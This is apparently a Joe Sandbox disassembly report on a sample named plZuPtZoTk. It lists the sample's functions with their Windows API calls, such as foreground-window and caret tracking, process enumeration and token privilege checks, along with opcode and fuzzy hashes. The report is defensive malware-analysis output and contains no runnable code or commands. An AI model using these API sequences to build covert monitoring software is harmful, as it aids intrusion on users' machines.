                                                                      • Opcode ID: 616fa75ff5c8cb208fc5a363e40995a8520a23e38edd226872ef30ea09a6c07c
                                                                      • Instruction ID: efae6b171dc930fb1a2f46c189f66b6992975a61cf6ab148bdc047b725678e98
                                                                      • Opcode Fuzzy Hash: 616fa75ff5c8cb208fc5a363e40995a8520a23e38edd226872ef30ea09a6c07c
                                                                      • Instruction Fuzzy Hash: 22418D34A09215EFCB02CF98F894EAD77F5FB49316F1540A9E815AB261D730A94ACF90
                                                                      APIs
                                                                      • GetForegroundWindow.USER32 ref: 00A516EB
                                                                        • Part of subcall function 00A23A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00A23A57
                                                                        • Part of subcall function 00A23A3D: GetCurrentThreadId.KERNEL32 ref: 00A23A5E
                                                                        • Part of subcall function 00A23A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00A225B3), ref: 00A23A65
                                                                      • GetCaretPos.USER32(?), ref: 00A516FF
                                                                      • ClientToScreen.USER32(00000000,?), ref: 00A5174C
                                                                      • GetForegroundWindow.USER32 ref: 00A51752
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                      • String ID:
                                                                      • API String ID: 2759813231-0
                                                                      • Opcode ID: 61bb3f80a4a858823ea1793e1a952c5a72bb28acfbf072f67738f7d6bb25e3e5
                                                                      • Instruction ID: a94ff88760457feda7240ba7e420b1ab6f6131c908fad5b1c3fd20b72ce052f4
                                                                      • Opcode Fuzzy Hash: 61bb3f80a4a858823ea1793e1a952c5a72bb28acfbf072f67738f7d6bb25e3e5
                                                                      • Instruction Fuzzy Hash: 83311075D00249AFC700DFA9C981EAEBBF9FF88304B5480A9E415E7251D6359E45CFA1
                                                                      APIs
                                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 00A2D501
                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 00A2D50F
                                                                      • Process32NextW.KERNEL32(00000000,?), ref: 00A2D52F
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00A2D5DC
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                      • String ID:
                                                                      • API String ID: 420147892-0
                                                                      • Opcode ID: 88be9c2f43cd34f7f0da32bc4ffb8fd840ed81b8eac03128af9d0e1e4f050663
                                                                      • Instruction ID: 56528ebedd2d4a22d77aacb92059b198267474063702cf83c45c0d292a782dc8
                                                                      • Opcode Fuzzy Hash: 88be9c2f43cd34f7f0da32bc4ffb8fd840ed81b8eac03128af9d0e1e4f050663
                                                                      • Instruction Fuzzy Hash: BE314B715083009FD301EF64D885FAABBE8EFD9354F14092DF586861A2EB719949CBA3
                                                                      APIs
                                                                        • Part of subcall function 009D9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 009D9BB2
                                                                      • GetCursorPos.USER32(?), ref: 00A59001
                                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00A17711,?,?,?,?,?), ref: 00A59016
                                                                      • GetCursorPos.USER32(?), ref: 00A5905E
                                                                      • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00A17711,?,?,?), ref: 00A59094
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                      • String ID:
                                                                      • API String ID: 2864067406-0
                                                                      • Opcode ID: 95b52762464dbf8b79d83b20abddc7504df1a545d6b8a4af648795590af1e608
                                                                      • Instruction ID: eea132024bd23a67266ad61ed92cab0698fcf3004c893cdeae047ef9143c9b12
                                                                      • Opcode Fuzzy Hash: 95b52762464dbf8b79d83b20abddc7504df1a545d6b8a4af648795590af1e608
                                                                      • Instruction Fuzzy Hash: 4821BF31600118FFCB25CF94CC58EEB3BB9FB89362F004455F9054B2A1C7319951EB61
                                                                      APIs
                                                                      • GetFileAttributesW.KERNEL32(?,00A5CB68), ref: 00A2D2FB
                                                                      • GetLastError.KERNEL32 ref: 00A2D30A
                                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 00A2D319
                                                                      • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00A5CB68), ref: 00A2D376
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: CreateDirectory$AttributesErrorFileLast
                                                                      • String ID:
                                                                      • API String ID: 2267087916-0
                                                                      • Opcode ID: 810af2aea0101a005fd83faf4f94b797e1c069ee202d6fe5227585dbf5a4f5c4
                                                                      • Instruction ID: 6a0513c618c4bc49b8dcb81dbc1570f6756f3a8f61754e1e24b916fd03dad38b
                                                                      • Opcode Fuzzy Hash: 810af2aea0101a005fd83faf4f94b797e1c069ee202d6fe5227585dbf5a4f5c4
                                                                      • Instruction Fuzzy Hash: 272180709083119FC300EF68D9859AE77E4FF95324F104A2DF499DB2A2E7309946CB93
                                                                      APIs
                                                                        • Part of subcall function 00A21014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00A2102A
                                                                        • Part of subcall function 00A21014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00A21036
                                                                        • Part of subcall function 00A21014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00A21045
                                                                        • Part of subcall function 00A21014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00A2104C
                                                                        • Part of subcall function 00A21014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00A21062
                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00A215BE
                                                                      • _memcmp.LIBVCRUNTIME ref: 00A215E1
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A21617
                                                                      • HeapFree.KERNEL32(00000000), ref: 00A2161E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                      • String ID:
                                                                      • API String ID: 1592001646-0
                                                                      • Opcode ID: 7d54c7e6ca1bf75e3949e56e9cb7fc092ba76fae2b726191c4ce5c81d59e1e52
                                                                      • Instruction ID: 235e40c54be4bbcb513a2abce75bda11699f0cdb9813db51d889f829a6ce064a
                                                                      • Opcode Fuzzy Hash: 7d54c7e6ca1bf75e3949e56e9cb7fc092ba76fae2b726191c4ce5c81d59e1e52
                                                                      • Instruction Fuzzy Hash: 3B216A71E00219EFDF10DFA9D945BEEB7B8FF94355F1844A9E441AB241E730AA05CBA0
                                                                      APIs
                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 00A5280A
                                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00A52824
                                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00A52832
                                                                      • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00A52840
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Long$AttributesLayered
                                                                      • String ID:
                                                                      • API String ID: 2169480361-0
                                                                      • Opcode ID: 771321ae989b447c1f09e3fb3f4ef92cae4fa5d9dc587eac94867f4d8a74c34b
                                                                      • Instruction ID: 90935a09ae63e810f7e0e1fd1917fd3269cc0c1b9a1ec4fb7f00e7656074d7f7
                                                                      • Opcode Fuzzy Hash: 771321ae989b447c1f09e3fb3f4ef92cae4fa5d9dc587eac94867f4d8a74c34b
                                                                      • Instruction Fuzzy Hash: 7621C131604211AFD714DB64C845FAA7BA5FF86325F148158F8268B6E2C771FC86C7D0
                                                                      APIs
                                                                        • Part of subcall function 00A28D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00A2790A,?,000000FF,?,00A28754,00000000,?,0000001C,?,?), ref: 00A28D8C
                                                                        • Part of subcall function 00A28D7D: lstrcpyW.KERNEL32(00000000,?,?,00A2790A,?,000000FF,?,00A28754,00000000,?,0000001C,?,?,00000000), ref: 00A28DB2
                                                                        • Part of subcall function 00A28D7D: lstrcmpiW.KERNEL32(00000000,?,00A2790A,?,000000FF,?,00A28754,00000000,?,0000001C,?,?), ref: 00A28DE3
                                                                      • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00A28754,00000000,?,0000001C,?,?,00000000), ref: 00A27923
                                                                      • lstrcpyW.KERNEL32(00000000,?,?,00A28754,00000000,?,0000001C,?,?,00000000), ref: 00A27949
                                                                      • lstrcmpiW.KERNEL32(00000002,cdecl,?,00A28754,00000000,?,0000001C,?,?,00000000), ref: 00A27984
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: lstrcmpilstrcpylstrlen
                                                                      • String ID: cdecl
                                                                      • API String ID: 4031866154-3896280584
                                                                      • Opcode ID: 9617d02ebf467ee9bb19279fb81e58741abb458aaf455e0a169c4b40e771dad4
                                                                      • Instruction ID: 6e67bb6a744927d28480a6bdb65a6ad5fa6a9819275e0376f5d3336a16c7d2b2
                                                                      • Opcode Fuzzy Hash: 9617d02ebf467ee9bb19279fb81e58741abb458aaf455e0a169c4b40e771dad4
                                                                      • Instruction Fuzzy Hash: C811E63A200312AFDB159F38E845E7E77A9FF85350B50803AF946CB3A4EB319951C7A1
                                                                      APIs
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00A57D0B
                                                                      • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00A57D2A
                                                                      • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00A57D42
                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00A3B7AD,00000000), ref: 00A57D6B
                                                                        • Part of subcall function 009D9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 009D9BB2
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Long
                                                                      • String ID:
                                                                      • API String ID: 847901565-0
                                                                      • Opcode ID: 454c4e17abbea663f6774d2b4ed9236a12901262674dc85ecd2ede7d2e08400a
                                                                      • Instruction ID: c17e2fd2a3d2c2bc6fd1e307a9bd4ff44b75f9933a1c65ae3ce52353dafdbf5e
                                                                      • Opcode Fuzzy Hash: 454c4e17abbea663f6774d2b4ed9236a12901262674dc85ecd2ede7d2e08400a
                                                                      • Instruction Fuzzy Hash: 1411CD32204615AFCB10DFA8EC44AAA3BA5BF45372B118325FC39E72F0E7319955CB40
                                                                      APIs
                                                                      • SendMessageW.USER32(?,00001060,?,00000004), ref: 00A556BB
                                                                      • _wcslen.LIBCMT ref: 00A556CD
                                                                      • _wcslen.LIBCMT ref: 00A556D8
                                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00A55816
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend_wcslen
                                                                      • String ID:
                                                                      • API String ID: 455545452-0
                                                                      • Opcode ID: eb1d90080cbaf7368073c67c26df857b64f32252e68eae97676be6e613d719fc
                                                                      • Instruction ID: c7efe0ccc56c20c57a6595a8288a6265b8b6b4c0405ee27dde6196425fdf2261
                                                                      • Opcode Fuzzy Hash: eb1d90080cbaf7368073c67c26df857b64f32252e68eae97676be6e613d719fc
                                                                      • Instruction Fuzzy Hash: 1511B471E0060496DF20DFB1CC95AEE77BCFF51762B108026FD15D6081E7748A88CBA0
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 87184ded072c972463dfc62b76ccd0dac1c424bd5c095f7eaf60a91a155b45db
                                                                      • Instruction ID: a8affd096f236287117c6829937bc3993c4df52602e74f81d9acd85589095ef7
                                                                      • Opcode Fuzzy Hash: 87184ded072c972463dfc62b76ccd0dac1c424bd5c095f7eaf60a91a155b45db
                                                                      • Instruction Fuzzy Hash: 3B014FB2209A1EBEF71116B86CC1F77662DEF817B8B341725F731A11D6DB608C4153A0
                                                                      APIs
                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00A21A47
                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00A21A59
                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00A21A6F
                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00A21A8A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID:
                                                                      • API String ID: 3850602802-0
                                                                      • Opcode ID: cc379e2066379b05ab59e8aa2ac3e0a598a6ed20410a073db9a4d25c78abe05d
                                                                      • Instruction ID: ca9b0c819589f2d3312fad1ff4da2430939407d5221c9923e897da6c04598b7c
                                                                      • Opcode Fuzzy Hash: cc379e2066379b05ab59e8aa2ac3e0a598a6ed20410a073db9a4d25c78abe05d
                                                                      • Instruction Fuzzy Hash: D8113C3AD01229FFEB10DBA8CD85FADBB78FB18750F2000A1E600B7290D6716E51DB94
                                                                      APIs
                                                                      • GetCurrentThreadId.KERNEL32 ref: 00A2E1FD
                                                                      • MessageBoxW.USER32(?,?,?,?), ref: 00A2E230
                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00A2E246
                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00A2E24D
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                      • String ID:
                                                                      • API String ID: 2880819207-0
                                                                      • Opcode ID: 4441058a4dae8967f619445262597c2bbef4b09cff413e61cf589a36fd4dfb1c
                                                                      • Instruction ID: 39e5cff70f4d215def3624040955599f5aea32b567684ccc1cc9b07ac3ef5afc
                                                                      • Opcode Fuzzy Hash: 4441058a4dae8967f619445262597c2bbef4b09cff413e61cf589a36fd4dfb1c
                                                                      • Instruction Fuzzy Hash: B111E572A04365FFCB01DBECAC05A9B7BACAB45321F104226F925E7290D670894187A0
                                                                      APIs
                                                                      • CreateThread.KERNEL32(00000000,?,009ECFF9,00000000,00000004,00000000), ref: 009ED218
                                                                      • GetLastError.KERNEL32 ref: 009ED224
                                                                      • __dosmaperr.LIBCMT ref: 009ED22B
                                                                      • ResumeThread.KERNEL32(00000000), ref: 009ED249
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                      • String ID:
                                                                      • API String ID: 173952441-0
                                                                      • Opcode ID: 7f4645d2260e825826635f5fac30ca9cfc4b76df7dcc1d5b0124c0d56dbe9ad3
                                                                      • Instruction ID: 7779051a2dc4eed75465a7dade77b9c6ca935fd54bb3fd9472a0833bafd548a8
                                                                      • Opcode Fuzzy Hash: 7f4645d2260e825826635f5fac30ca9cfc4b76df7dcc1d5b0124c0d56dbe9ad3
                                                                      • Instruction Fuzzy Hash: 4701D636806248BFC7125BA7DC05BAE7A6DEFC1731F104219FA35962D0DB718D01C7A0
                                                                      APIs
                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 009C604C
                                                                      • GetStockObject.GDI32(00000011), ref: 009C6060
                                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 009C606A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: CreateMessageObjectSendStockWindow
                                                                      • String ID:
                                                                      • API String ID: 3970641297-0
                                                                      • Opcode ID: 56b7c417928b91f6fef2ea5ac346e2ca6c125ff3bdea2eb3d0aee2c30ec19e12
                                                                      • Instruction ID: 71fd74ba6fcf375e87dff4f5e8019cb7c77923cef1c8fa4f4e491809f13a7ac2
                                                                      • Opcode Fuzzy Hash: 56b7c417928b91f6fef2ea5ac346e2ca6c125ff3bdea2eb3d0aee2c30ec19e12
                                                                      • Instruction Fuzzy Hash: D5115E72501609BFEF128F959C54FEA7B6DFF0C3A5F050215FA1462110D7369C619B91
                                                                      APIs
                                                                      • ___BuildCatchObject.LIBVCRUNTIME ref: 009E3B56
                                                                        • Part of subcall function 009E3AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 009E3AD2
                                                                        • Part of subcall function 009E3AA3: ___AdjustPointer.LIBCMT ref: 009E3AED
                                                                      • _UnwindNestedFrames.LIBCMT ref: 009E3B6B
                                                                      • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 009E3B7C
                                                                      • CallCatchBlock.LIBVCRUNTIME ref: 009E3BA4
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                      • String ID:
                                                                      • API String ID: 737400349-0
                                                                      • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                      • Instruction ID: 7fcff65aed567fea1e9b5d2ef7236205692c6bcecb67fd6d9c96e879b31113e7
                                                                      • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                      • Instruction Fuzzy Hash: BA01E932100189BBDF126E96CC46EEB7B6EEF98754F048054FE58A6121D732ED61DBA0
                                                                      APIs
                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,009C13C6,00000000,00000000,?,009F301A,009C13C6,00000000,00000000,00000000,?,009F328B,00000006,FlsSetValue), ref: 009F30A5
